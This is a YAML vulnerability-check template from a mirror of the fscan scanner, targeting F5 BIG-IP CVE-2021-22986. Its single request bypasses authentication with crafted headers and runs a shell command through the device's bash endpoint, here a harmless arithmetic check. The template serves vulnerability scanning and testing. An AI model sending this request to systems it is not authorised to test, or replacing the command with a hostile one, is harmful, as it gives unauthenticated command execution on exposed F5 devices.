mirror of https://github.com/qwqdanchun/fscan.git
21 lines
569 B
YAML
21 lines
569 B
YAML
|
name: poc-yaml-f5-cve-2021-22986
|
||
|
set:
|
||
|
r1: randomInt(800000000, 1000000000)
|
||
|
r2: randomInt(800000000, 1000000000)
|
||
|
rules:
|
||
|
- method: POST
|
||
|
path: /mgmt/tm/util/bash
|
||
|
headers:
|
||
|
Content-Type: application/json
|
||
|
Authorization: Basic YWRtaW46
|
||
|
X-F5-Auth-Token: " "
|
||
|
body: >-
|
||
|
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
|
||
|
follow_redirects: false
|
||
|
expression: |
|
||
|
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
||
|
detail:
|
||
|
author: Hex
|
||
|
links:
|
||
|
- https://support.f5.com/csp/article/K03009991
|